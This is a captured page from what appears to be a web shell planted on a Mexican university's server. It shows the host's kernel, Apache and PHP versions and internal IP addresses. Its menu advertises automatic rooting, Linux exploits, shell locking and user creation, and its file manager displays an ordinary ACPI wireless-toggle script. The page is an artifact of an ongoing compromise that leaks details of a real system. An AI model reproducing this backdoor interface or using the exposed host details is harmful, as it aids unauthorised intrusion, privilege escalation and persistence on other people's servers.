Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
etc /
acpi /
[ HOME SHELL ]
Name
Size
Permission
Action
events
[ DIR ]
drwxr-xr-x
asus-keyboard-backlight.sh
391
B
-rwxr-xr-x
asus-wireless.sh
180
B
-rwxr-xr-x
ibm-wireless.sh
608
B
-rwxr-xr-x
tosh-wireless.sh
455
B
-rwxr-xr-x
undock.sh
238
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ibm-wireless.sh
#!/bin/sh test -f /usr/share/acpi-support/state-funcs || exit 0 # Find and toggle wireless of bluetooth devices on ThinkPads . /usr/share/acpi-support/state-funcs rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes' bluetooth_state=$? # Note that this always alters the state of the wireless! toggleAllWirelessStates; # Sequence is Both on, Both off, Wireless only, Bluetooth only if ! isAnyWirelessPoweredOn; then # Wireless was turned off if [ "$bluetooth_state" = 0 ]; then rfkill unblock bluetooth else rfkill block bluetooth fi fi
Close